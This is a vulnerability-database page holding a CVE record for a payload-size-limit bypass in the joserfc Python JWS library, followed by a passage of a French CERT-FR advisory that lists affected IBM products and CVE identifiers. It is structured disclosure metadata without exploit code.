Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-48990 (GCVE-0-2026-48990)
Vulnerability from cvelistv5 – Published: 2026-06-17 21:08 – Updated: 2026-06-18 12:51| URL | Tags |
|---|---|
| https://github.com/authlib/joserfc/security/advis… | x_refsource_CONFIRM |
| https://github.com/authlib/joserfc/releases/tag/1.6.7 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48990",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-18T12:51:44.745917Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-18T12:51:59.900Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "joserfc",
"vendor": "authlib",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions 1.3.4 through 1.6.5, joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length, which can lead to resource exhaustion. The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length. Applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification have a moderate availability risk. This issue has been fixed in version 1.6.7."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T21:08:10.534Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
},
{
"name": "https://github.com/authlib/joserfc/releases/tag/1.6.7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
}
],
"source": {
"advisory": "GHSA-wphv-vfrh-23q5",
"discovery": "UNKNOWN"
},
"title": "joserfc: b64=false RFC7797 JWS payloads bypass JWSRegistry payload-size limits during deserialization"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48990",
"datePublished": "2026-06-17T21:08:10.534Z",
"dateReserved": "2026-05-26T23:26:07.975Z",
"dateUpdated": "2026-06-18T12:51:59.900Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-48990",
"date": "2026-08-04",
"epss": "0.00163",
"percentile": "0.05924"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-48990\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-17T22:16:23.270\",\"lastModified\":\"2026-06-23T15:50:59.400\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions 1.3.4 through 1.6.5, joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length, which can lead to resource exhaustion. The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length. Applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification have a moderate availability risk. This issue has been fixed in version 1.6.7.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"authlib\",\"product\":\"joserfc\",\"versions\":[{\"version\":\"\u003c 1.6.7\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-06-18T12:51:44.745917Z\",\"id\":\"CVE-2026-48990\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"},{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"references\":[{\"url\":\"https://github.com/authlib/joserfc/releases/tag/1.6.7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"redhat_vex": {
"aggregate_severity": "Moderate",
"current_release_date": "2026-08-04T21:57:09+00:00",
"cve": "CVE-2026-48990",
"id": "CVE-2026-48990",
"initial_release_date": "2026-06-17T21:08:10.534000+00:00",
"product_status:fixed": "11",
"product_status:known_not_affected": "200",
"source": "Red Hat CSAF VEX",
"status": "final",
"title": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48990.json",
"version": "3"
},
"suse_vex": {
"aggregate_severity": "moderate",
"current_release_date": "2026-06-20T02:29:08Z",
"cve": "CVE-2026-48990",
"id": "CVE-2026-48990",
"initial_release_date": "2026-06-19T01:50:21Z",
"product_status:recommended": "3",
"source": "SUSE CSAF VEX",
"status": "interim",
"title": "SUSE CVE CVE-2026-48990",
"url": "https://ftp.suse.com/pub/projects/security/csaf-vex/cve-2026-48990.json",
"version": "3"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48990\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-18T12:51:44.745917Z\"}}}], \"references\": [{\"url\": \"https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-18T12:51:36.906Z\"}}], \"cna\": {\"title\": \"joserfc: b64=false RFC7797 JWS payloads bypass JWSRegistry payload-size limits during deserialization\", \"source\": {\"advisory\": \"GHSA-wphv-vfrh-23q5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"authlib\", \"product\": \"joserfc\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.6.7\"}]}], \"references\": [{\"url\": \"https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5\", \"name\": \"https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/authlib/joserfc/releases/tag/1.6.7\", \"name\": \"https://github.com/authlib/joserfc/releases/tag/1.6.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions 1.3.4 through 1.6.5, joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length, which can lead to resource exhaustion. The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length. Applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification have a moderate availability risk. This issue has been fixed in version 1.6.7.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-17T21:08:10.534Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-48990\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-18T12:51:59.900Z\", \"dateReserved\": \"2026-05-26T23:26:07.975Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-17T21:08:10.534Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2026-AVI-0933
Vulnerability from certfr_avis - Published: 2026-07-24 - Updated: 2026-07-24
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar Assistant | QRadar AI Assistant versions antérieures à 2.1.0 | ||
| IBM | Sterling | Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x antérieures à 6.2.2.1 | ||
| IBM | Sterling | Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x antérieures à 6.2.1.2 | ||
| IBM | QRadar SIEM | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP15 IF05 | ||
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.4.x antérieures à 6.4.0.9 | ||
| IBM | Tivoli | Tivoli System Automation Application Manager 4.1 avec WebSphere Application Server versions 8.5 ou 9.0 sans les derniers correctifs de sécurité | ||
| IBM | Cognos Command Center | Cognos Command Center versions 12.2.4.1 à 12.2.5 FP1 IF3 antérieures à 12.2.5 FP1 IF4 | ||
| IBM | AIX | AIX versions 7.2 et 7.3 sans le dernier correctif de sécurité | ||
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.20 | ||
| IBM | Sterling | Sterling B2B Integrator et Sterling File Gateway versions 6.2.0.x antérieures à 6.2.0.6_1 | ||
| IBM | WebSphere | WebSphere Application Server - Liberty versions 17.0.0.3 à 26.0.0.7 sans les correctifs de sécurité temporaires PH71839 et PH72167 ou antérieures à 26.0.0.8 (disponibilité prévue pour le troisième trimestre 2026) | ||
| IBM | Tivoli | Tivoli Composite Application Manager for Applications WebSphere MQ Monitoring Agent version 7.3.0 Fix Pack 4 sans le dernier correctif pour Tivoli Monitoring | ||
| IBM | VIOS | VIOS version 4.1 sans le dernier correctif de sécurité | ||
| IBM | Sterling | Sterling B2B Integrator et Sterling File Gateway versions 6.1.2.x antérieures à 6.1.2.8 | ||
| IBM | Tivoli | Tivoli Application Dependency Discovery Manager versions 7.3.0.0 à 7.3.0.12 avec WebSphere Application Server Liberty versions antérieures à 26.0.0.7 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar AI Assistant versions ant\u00e9rieures \u00e0 2.1.0",
"product": {
"name": "QRadar Assistant",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x ant\u00e9rieures \u00e0 6.2.2.1",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.2",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP15 IF05",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.9",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Tivoli System Automation Application Manager 4.1 avec WebSphere Application Server versions 8.5 ou 9.0 sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "Tivoli",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Command Center versions 12.2.4.1 \u00e0 12.2.5 FP1 IF3 ant\u00e9rieures \u00e0 12.2.5 FP1 IF4",
"product": {
"name": "Cognos Command Center",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX versions 7.2 et 7.3 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.20",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.0.x ant\u00e9rieures \u00e0 6.2.0.6_1",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server - Liberty versions 17.0.0.3 \u00e0 26.0.0.7 sans les correctifs de s\u00e9curit\u00e9 temporaires PH71839 et PH72167 ou ant\u00e9rieures \u00e0 26.0.0.8 (disponibilit\u00e9 pr\u00e9vue pour le troisi\u00e8me trimestre 2026)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Tivoli Composite Application Manager for Applications WebSphere MQ Monitoring Agent version 7.3.0 Fix Pack 4 sans le dernier correctif pour Tivoli Monitoring",
"product": {
"name": "Tivoli",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS version 4.1 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.1.2.x ant\u00e9rieures \u00e0 6.1.2.8",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Tivoli Application Dependency Discovery Manager versions 7.3.0.0 \u00e0 7.3.0.12 avec WebSphere Application Server Liberty versions ant\u00e9rieures \u00e0 26.0.0.7",
"product": {
"name": "Tivoli",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-53540",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-53540"
},
{
"name": "CVE-2026-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54283"
},
{
"name": "CVE-2026-50557",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50557"
},
{
"name": "CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"name": "CVE-2026-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48990"
},
{
"name": "CVE-2026-11383",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11383"
},
{
"name": "CVE-2026-34180",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34180"
},
{
"name": "CVE-2026-45416",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45416"
},
{
"name": "CVE-2026-42766",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42766"
},
{
"name": "CVE-2026-9076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9076"
},
{
"name": "CVE-2026-42211",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42211"
},
{
"name": "CVE-2026-54530",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54530"
},
{
"name": "CVE-2026-54514",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54514"
},
{
"name": "CVE-2021-23336",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23336"
},
{
"name": "CVE-2026-48710",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48710"
},
{
"name": "CVE-2026-42770",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42770"
},
{
"name": "CVE-2026-24308",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24308"
},
{
"name": "CVE-2026-45673",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45673"
},
{
"name": "CVE-2026-9072",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9072"
},
{
"name": "CVE-2026-54275",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54275"
},
{
"name": "CVE-2026-32635",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32635"
},
{
"name": "CVE-2026-27171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
},
{
"name": "CVE-2026-45445",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45445"
},
{
"name": "CVE-2026-29145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29145"
},
{
"name": "CVE-2026-8858",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8858"
},
{
"name": "CVE-2026-54651",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54651"
},
{
"name": "CVE-2026-54278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54278"
},
{
"name": "CVE-2026-54516",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54516"
},
{
"name": "CVE-2026-53538",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-53538"
},
{
"name": "CVE-2026-2006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2006"
},
{
"name": "CVE-2026-54515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54515"
},
{
"name": "CVE-2026-33245",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33245"
},
{
"name": "CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"name": "CVE-2025-5115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
},
{
"name": "CVE-2021-47154",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47154"
},
{
"name": "CVE-2026-11541",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11541"
},
{
"name": "CVE-2026-11707",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11707"
},
{
"name": "CVE-2026-2005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2005"
},
{
"name": "CVE-2026-7383",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-7383"
},
{
"name": "CVE-2026-48522",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48522"
},
{
"name": "CVE-2026-45674",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45674"
},
{
"name": "CVE-2026-34500",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34500"
},
{
"name": "CVE-2026-11594",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11594"
},
{
"name": "CVE-2026-54267",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54267"
},
{
"name": "CVE-2026-29146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29146"
},
{
"name": "CVE-2026-48735",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48735"
},
{
"name": "CVE-2026-15057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-15057"
},
{
"name": "CVE-2026-45409",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45409"
},
{
"name": "CVE-2026-47265",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47265"
},
{
"name": "CVE-2026-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54282"
},
{
"name": "CVE-2026-44249",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44249"
},
{
"name": "CVE-2026-41844",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41844"
},
{
"name": "CVE-2026-48988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48988"
},
{
"name": "CVE-2026-54268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54268"
},
{
"name": "CVE-2026-5598",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5598"
},
{
"name": "CVE-2026-54277",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54277"
},
{
"name": "CVE-2026-41842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41842"
},
{
"name": "CVE-2026-11536",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11536"
},
{
"name": "CVE-2026-8646",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8646"
},
{
"name": "CVE-2026-54280",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54280"
},
{
"name": "CVE-2026-27970",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27970"
},
{
"name": "CVE-2026-9320",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9320"
},
{
"name": "CVE-2026-54265",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54265"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2026-50171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50171"
},
{
"name": "CVE-2026-45447",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45447"
},
{
"name": "CVE-2026-22731",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22731"
},
{
"name": "CVE-2026-41843",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41843"
},
{
"name": "CVE-2026-22732",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22732"
},
{
"name": "CVE-2026-40181",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40181"
},
{
"name": "CVE-2026-54274",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54274"
},
{
"name": "CVE-2026-34487",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34487"
},
{
"name": "CVE-2026-54512",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54512"
},
{
"name": "CVE-2026-41850",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41850"
},
{
"name": "CVE-2026-34197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34197"
},
{
"name": "CVE-2026-33244",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33244"
},
{
"name": "CVE-2026-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54266"
},
{
"name": "CVE-2026-45446",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45446"
},
{
"name": "CVE-2026-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40198"
},
{
"name": "CVE-2026-53537",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-53537"
},
{
"name": "CVE-2026-4176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4176"
},
{
"name": "CVE-2026-48524",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48524"
},
{
"name": "CVE-2026-40046",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40046"
},
{
"name": "CVE-2026-52725",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-52725"
},
{
"name": "CVE-2026-54273",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54273"
},
{
"name": "CVE-2025-64775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64775"
},
{
"name": "CVE-2026-41852",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41852"
},
{
"name": "CVE-2026-27830",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27830"
},
{
"name": "CVE-2026-11897",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11897"
},
{
"name": "CVE-2026-25854",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25854"
},
{
"name": "CVE-2026-54531",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54531"
},
{
"name": "CVE-2026-48155",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48155"
},
{
"name": "CVE-2026-41851",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41851"
},
{
"name": "CVE-2026-50010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50010"
},
{
"name": "CVE-2026-54279",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54279"
},
{
"name": "CVE-2026-42767",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42767"
},
{
"name": "CVE-2026-3381",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3381"
},
{
"name": "CVE-2026-22733",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22733"
},
{
"name": "CVE-2026-41841",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41841"
},
{
"name": "CVE-2026-39304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39304"
},
{
"name": "CVE-2026-54517",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54517"
},
{
"name": "CVE-2026-50170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-50170"
},
{
"name": "CVE-2026-41846",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41846"
},
{
"name": "CVE-2026-40199",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40199"
},
{
"name": "CVE-2026-54513",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54513"
},
{
"name": "CVE-2026-54518",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54518"
},
{
"name": "CVE-2026-54276",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54276"
},
{
"name": "CVE-2025-66566",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66566"
},
{
"name": "CVE-2025-66168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66168"
},
{
"name": "CVE-2026-42342",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42342"
},
{
"name": "CVE-2026-12143",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-12143"
},
{
"name": "CVE-2026-48523",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48523"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-66675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66675"
},
{
"name": "CVE-2026-33227",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33227"
},
{
"name": "CVE-2026-34483",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34483"
},
{
"name": "CVE-2026-34182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34182"
},
{
"name": "CVE-2026-0636",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0636"
},
{
"name": "CVE-2026-47691",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47691"
},
{
"name": "CVE-2026-24880",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24880"
},
{
"name": "CVE-2026-48525",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48525"
},
{
"name": "CVE-2026-2004",
